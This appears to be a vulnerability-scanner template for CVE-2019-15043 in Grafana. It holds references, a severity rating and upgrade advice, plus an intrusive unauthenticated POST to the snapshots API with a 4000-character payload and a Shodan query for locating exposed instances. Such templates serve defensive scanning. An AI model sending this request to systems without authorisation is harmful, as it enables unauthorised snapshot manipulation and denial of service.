id: CVE-2019-15043 info: name: Grafana - Improper Access Control author: Joshua Rogers severity: high description: | Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. reference: - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://bugzilla.redhat.com/show_bug.cgi?id=1746945 - https://aaron-hoffmann.com/posts/cve-2019-15043/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 remediation: Upgrade to 6.3.4 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-284 metadata: max-request: 1 shodan-query: title:"Grafana" verified: true tags: cve,cve2019,grafana,dos,intrusive variables: payload: '{{repeat("A", 4000)}}' http: - method: POST path: - "{{BaseURL}}/api/snapshots" headers: Content-Type: application/json body: '{"dashboard": {"name":"{{payload}}"}}' matchers-condition: and matchers: - type: word part: body words: - '"deleteUrl":' - '"deleteKey":' - '"key":' - '"url":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # Enhanced by md on 2023/04/12